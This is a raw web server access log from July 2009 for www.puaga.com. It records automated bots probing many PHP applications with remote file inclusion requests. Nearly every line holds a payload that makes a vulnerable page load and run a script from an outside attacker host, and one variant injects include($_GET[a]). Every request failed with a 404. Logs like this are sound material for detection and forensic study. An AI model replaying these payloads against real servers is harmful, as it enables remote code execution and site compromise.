60.43.229.5 - - [05/Jul/2009:11:28:23 -0700] "GET /logs/access_090519.log//newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:28:24 -0700] "GET /logs/access_090528.log//newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:27 -0700] "GET /logs/access_090520.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:27 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:27 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:29 -0700] "GET /logs/access_090520.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:28:32 -0700] "GET /logs/access_090606.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:38 -0700] "GET /logs/access_090523.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:28:40 -0700] "GET /logs/access_090523.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:40 -0700] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:40 -0700] "GET /logs/access_090521.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:40 -0700] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:40 -0700] "GET /logs/access_090622.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:51 -0700] "GET /logs/access_090516.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:53 -0700] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:53 -0700] "GET /logs/access_090516.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:53 -0700] "GET /logs/access_090521.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:53 -0700] "GET /logs/access_090622.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:28:54 -0700] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:29:07 -0700] "GET /logs/access_090614.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:29:36 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:29:38 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:29:43 -0700] "GET /logs/access_090516.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:29:48 -0700] "GET /logs/access_090516.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:50 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:50 -0700] "GET /logs/access_090520.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:50 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:52 -0700] "GET /logs/access_090520.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:53 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:29:53 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:29:54 -0700] "GET /logs/access_090606.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:29:55 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:29:56 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:30:05 -0700] "GET /logs/access_090519.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:11:30:19 -0700] "GET /logs///modules/errors.php?error=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:30:31 -0700] "GET /logs/access_090614.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:30:31 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:30:32 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:30:32 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:30:41 -0700] "GET /logs/access_090523.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:30:42 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:30:42 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:30:42 -0700] "GET /logs/access_090523.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:30:43 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:31:14 -0700] "GET /logs/access_090614.log%20%20//Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:31:44 -0700] "GET /logs/access_090519.log%20%20//Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.189.39.159 - - [05/Jul/2009:11:33:03 -0700] "GET /logs/access_090511.log//ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.189.39.159 - - [05/Jul/2009:11:33:03 -0700] "GET /ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.189.39.159 - - [05/Jul/2009:11:33:03 -0700] "GET /logs//ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:33:08 -0700] "GET /logs/access_090622.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:33:08 -0700] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:33:08 -0700] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:11:33:10 -0700] "GET /logs/access_090521.log//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://wmk-werkzeugmaschinen.de/log/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:33:50 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:34:01 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:11:34:15 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:34:16 -0700] "GET /logs/access_090511.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:34:16 -0700] "GET /images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:34:17 -0700] "GET /logs/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
211.189.39.159 - - [05/Jul/2009:11:34:29 -0700] "GET /logs/access_090516.log//ask_password.php?%20dir=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:11:34:36 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:34:54 -0700] "GET /logs/access_090520.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:11:35:16 -0700] "GET /logs/access_090524.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.16.16.206 - - [05/Jul/2009:11:35:22 -0700] "GET /logs/access_090531.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:35:41 -0700] "GET /logs/access_090606.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:36:08 -0700] "GET /logs/access_090614.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:11:39:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:11:39:22 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:11:39:22 -0700] "GET /logs/access_090510.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:39:32 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:39:32 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:39:32 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:32 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:32 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:32 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:44 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:39:52 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:39:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:39:52 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:39:53 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:58 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:39:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:40:05 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:40:05 -0700] "GET /logs/access_090614.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:40:05 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:11 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:11 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:11 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:12 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:17 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:25 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:25 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:26 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:26 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:40:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:33 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:33 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:33 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:38 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:38 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:38 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:40:42 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
98.116.62.213 - - [05/Jul/2009:11:40:50 -0700] "GET /config.php?inc_dir=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.116.62.213 - - [05/Jul/2009:11:40:52 -0700] "GET /logs/config.php?inc_dir=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.116.62.213 - - [05/Jul/2009:11:40:52 -0700] "GET /logs/access_090605.log/config.php?inc_dir=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:40:53 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:40:53 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:40:54 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:41:02 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:41:02 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:41:02 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:41:14 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:41:17 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
